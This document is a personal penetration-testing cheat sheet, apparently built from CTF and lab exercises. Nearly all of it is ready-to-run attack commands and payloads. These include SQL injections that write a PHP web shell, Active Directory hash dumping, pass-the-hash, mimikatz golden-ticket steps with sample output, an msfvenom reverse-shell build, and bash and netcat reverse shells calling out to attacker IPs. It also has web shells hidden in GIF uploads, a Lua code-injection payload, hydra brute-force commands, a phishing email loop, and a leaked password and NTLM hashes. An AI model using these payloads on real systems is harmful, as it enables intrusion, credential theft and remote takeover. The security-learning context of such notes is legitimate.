# PENETRATION TESTING NOTES
pass the hash
- allows authenticating as a user without knowing the password
https://www.safetydetectives.com/is-website-secure/?url=http%3A%2F%2F167.99.72.221
- check vulnerability
# WINDOWS CMD TIPS & TRICKS
find
equivalent: dir /s c:\file.txt
findstr /R "something" .
- search for a string (regex) in files
# FIND COMMANDS
# Find files:
find / -name Kernel.php 2>/dev/null
# Find SUID files:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print # files with no owner or no group
find / -name perl*
find / -name python*
find / -name gcc*
find / -name c
# SHELL
cat file.txt | grep -v 'Size: 157' (hide every line that contains "Size: 157")
# Fix terminal:
stty size
stty rows <value> cols <value>
# MYSQLI INJECTION
'union select 1, @@version-- -
- show the version of the SQL server
'union select 1, table_name FROM information_schema.tables-- -
- enumerate tables
UNION SELECT 1, LOAD_FILE('/etc/passwd')-- -
- load files in the serverUNION SELECT 1, 0x3C3F7068702073797374656D28245F524551554553545B27636D64275D293B203F3E INTO OUTFILE '/var/www/html/plsgod.php'-- - -
sqli exfil bypass with hexadecimal
UNION SELECT char(60,104,116,109,108,62,60,98,111,100,121,62,60,112,62,72,105,32,105,116,32,119,111,114,107,115,33,60,47,112,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62), null INTO OUTFILE '/var/www/html/test.html'-- -
- sqli exfil bypass with char() function
# RELATED LINKS
- https://www.websec.ca/kb/sql_injection
# ACTIVE DIRECTORY [AD]
enum4linux
- enumerate SMB on ports 139/445 [AD]
nbtscan
- enumerate NETBIOS shares [AD]
./kerbrute_linux_amd64 userenum -v -d spookysec.local --dc 10.10.21.202 users.txt | grep VALID
- kerbrute Kerberos ASREP [AD]
impacket
- used to get hashes and more [AD]
python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/ -no-pass -usersfile validusers.txt -format hashcat
- no-pass (pass-the-hash) enumeration [AD]
python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm/-just-dc 10.10.201.139/backup@10.10.201.139
- dump hashes from the DC [AD]
ruby /opt/evil-winrm/evil-winrm.rb -i 10.10.36.142 -u USER -H 0e0363213e37b94221497260b0bcb4fc
- pass the hash [AD]
# WINDOWS POST-EXPLOITATION
# POWERVIEW
powershell -ep bypass
- bypass the execution policy to run scripts [WPE]
. .\PowerView.ps1
- start the PowerView script [WPE]
Get-NetUser | select cn
- PowerView: enumerate domain users [WPE]
Get-NetGroup -GroupName *admin*
- PowerView: enumerate domain groups [WPE]
Invoke-ShareFinder
- PowerView: enumerate shared folders [WPE]
Get-NetComputer -fulldata | select operatingsystem
- powerview enumerate operatingsystem [WPE]
# BLOODHOUND (active directory mapping)
powershell -ep bypass
- bypass the execution policy
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- save mapping of the active directory [WPE]
# MIMIKATZ
privilege::debug
- check that mimikatz runs as administrator
lsadump::lsa /patch
- dump all hashes
lsadump::lsa /inject /name:krbtgt
- dump hash and security identifier to create golden ticket
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
LM :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 372f405db05d3cafd27f8e6a4a097b2c
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
- create golden ticket (id is the default admin group id)
misc::cmd
- spawn a new shell with elevated privileges
dir \\Desktop-1\c$
- access to another computer in the domain (pivot)
# SUID ENUMERATIONS
find / -perm -u=s -type f 2>/dev/null
- [SUID]
# SAMBA ENUMERATIONS
nmap -p445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
- enumerate samba shares
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
- enumerate mounts
smbget -R smb://$IP/
- fetch the shares recursively
showmount $IP
- show the mounts available on the server
smbclient \\\\10.10.201.139\\backup -U svc-user
- enter a share
smbclient -L 10.10.201.139 -U svc-user
- list shares
smbmap
# GIT ENUMERATIONS
# HASHES
Aministrator:500:aaa3b435b51404eeaac3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
- NTLM hash
hashcat -m 1710 -a 0 hash:salt /usr/share/wordlists/rockyou.txt
- crack a hash with a salt
# ZIP FILE CRACKING
7zipcrack
- crack the password of a 7zip file
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt Found.zip
- crack the password of a zip file
7z
- open a 7zip file
fcrackzip -B
- run a benchmark
fcrackzip -v -m zip6 -l 4-8 -u secret.zip
- crack a zip file whose password is 4-8 characters long
# BINARY EXPLOITATION
hexeditor
- to view binary format and hex format
# FORENSICS [FRS]
- search for wanted strings [FRS]
- we can look into the HTTP stream and then download all the activity by exporting HTTP objects [FRS]
sudo tcpdump -s 0 -i tun0 -w tcpdump.pcap
- capture traffic [FRS]
tshark -r overpass2.pcapng -T fields -e ip.dst | sort | uniq -c
- display the IPs with the most packets [FRS]
tshark -r overpass2.pcapng ip.dst==192.168.170.159 | head
- filter by IP [FRS]
tshark -r overpass2.pcapng --export-objects "http,http-objects"
- export HTTP objects [FRS]
# CRYPTOGRAPHY
https://scwf.dima.ninja/
# STEGANOGRAPHY
stegsolve
- image steganography solver
steghide (extract): steghide extract -sf <filename>
(hit enter on passphrase)
# PROFTPD
SITE CPFR $FILE
- copy the target file into the buffer
SITE CPTO $DESTINATIONPWD
- move the copied file into the destination directory
# MSFVENOM
msfvenom -p windows/shell_reverse_tcp LHOST=10.66.67.22 LPORT=9000 -f exe -o shell.exe
# SMTP
python2 imapgrab.py -l -s sneakycorp.htb -u username-p 'password'
- log in to the email server [SMTP]
python2 imapgrab.py -d -v -M -f ~/Documents/ctf/htb/sneakymailer/backup -s sneakycorp.htb -u paulbyrd -p '^(#J@SkFv2[%KhIxKk(Ju
hqcHl<:Ht' -m 'ALL'` - download mails
evolution
- open the mails with the Evolution app
# SMTP COMMANDS
• a LIST "" "*"
• a LIST "" “INBOX/*”
• a STATUS INBOX RECENT
• a select inbox
HELO my.server.com
MAIL FROM:
RCPT TO:
DATA
From: Danny Dolittle
To: Sarah Smith
Subject: Email sample
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test email for you to read.
.
QUIT
# FTP
- we can upload file using
tftp
# SUBDOMAIN ENUMERATIONS / FUZZING
# WFUZZ
wfuzz -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H 'Host: FUZZ.sneakycorp.htb' --hc 301
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H "Host:FUZZ.sneakycorp.htb"
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.202/FUZZ
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
- look for common directories
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ.php
- look for common files
wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
- fuzz parameters in the URL
wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://minion.htb/userinfo.php
- fuzz POST requests
wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://minion.htb/FUZZ
- fuzz with cookies
wfuzz -z file,wordlist/general/common.txt -b cookie=FUZZ http://minion.htb/
- fuzz cookie values
wfuzz -z file,wordlist/general/common.txt -H "myheader: headervalue" -H "myheader2: headervalue2" http://minion.htb/FUZZ
- fuzz with custom headers
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://minion.htb/
- fuzz HTTP verbs
wfuzz -z file,wordlist/general/common.txt -p localhost:8080 http://minion.htb/FUZZ
- use a proxy
wfuzz -z file,wordlist/general/common.txt -p localhost:2222:SOCKS5 http://minion.htb/FUZZ
- use a SOCKS proxy
# SCRIPTS
while read email; do swaks --to $email --from security@htb --body "goto http://10.10.14.69" --server sneakycorp.htb;done < email.txt
# BLUETOOTH HACKING
use hcitool scan
l2ping -i hci0 -s 600 -f 39:8C:14:6B:53:2D
//get a shell from webapp or web shell cd /var/tmp && echo '#!/bin/bash' >> test.sh && echo 'bash -i >& /dev/tcp/192.168.60.128/444 0>&1' >> test.sh && chmod 777 test.sh && ./test.sh <?php $cmd=$_GET['cmd']; print('$cmd'); ?> -- > get shells from uploaded image
# REMOTE CODE EXECUTION (RCE)
<?php echo system($_GET['cmd']); ?>
<?php $_GET['param1']($_GET['param2']); ?>
echo "bash -i >& /dev/tcp/10.10.14.17/1234 0>&1" | base64
# Inject code to image or gif:
echo '<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>' >> bad.gif then upload
convert -delay 20 -loop 0 *.jpg example.gif --> convert images to a gif
http://192.168.0.10/imfadministrator/uploads/ad54eabb6fde.gif?cmd=ls -->> ?cmd=ls to use the cmd commands
# LOCAL FILE INCLUSIONS (LFI)
php://filter/convert.base64-encode/resource=config http://172.20.10.3/?page=php://filter/convert.base64-encode/resource=config
# WEBSITE/PAGE VULNERABILITY
check for LFI vulnerabilities when the URL has a ?page=<input>
structure. the tool kadimus can be used (https://github.com/P0cL4bs/Kadimus)
usage: ./kadimus -u 192.168.246.105/?page=login ---> must be run from its own directory. 3rd-party tools always live in /opt
strings filename.jpg{png,bmp,jpg} # Stego
cewl : cewl $ip -w cewl.txt
# HYDRA
# hydra http
hydra -l <username> -P <wordlist> <IP> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid Password"
# hydra smtp attack
hydra -s 25 -v -V -l test@example.com -P /path/to/password/list.lst -t 1 -w 20 -f 192.168.10.5 smtp
# hydra ssh attack
hydra -L users.txt -P passwords.txt ssh://10.10.10.7
hydra <ip address> ssh -vV -L <login list> -P <password list> -e s -t 10
# SQLMAP
sqlmap: when running Burp, copy the login (or other) request entirely, paste it into a file and save it as login.req //IMPORTANT
sqlmap -r login.req
sqlmap -u http://192.168.246.105/?page=login --data="user=user&pass=pass&submit=Login" -p user --dbms mysql --risk=3 --level=3
sqlmap -r capture.txt --dbs --threads 10 --level 5 --risk 3
sqlmap --level 5 --risk 3 --url "http://172.20.10.3/?page=add_value*"
sqlmap -D database --tables --url
sqlmap --dbs --tables --url
sqlmap --tables -D databasename --url
sqlmap --columns -D databasename -T tablename --url
# SSH
# SSH login with id_rsa:
ssh -i id_rsa username@ip
# Send email with telnet over port 25
telnet ip 25
EHLO or HELO druckkammer.machine.htb <--- the domain does not matter, just put something there
VRFY username@localhost <-- optional
mail from:<gillbates@microsucks.com>
rcpt to:<username@localhost>
data
Subject: YOU GOT OWNED <-- example
MESSAGE OR SHELL CODE HERE!
# LUA RCE
/weather/forecast?city=London')%3bos.execute("rm++/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.69+9001+>/tmp/f")--
- unsanitized input leads to Lua code execution
# GPG ENCRYPT / DECRYPT
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/idk.gz
- decrypt a GPG-encrypted file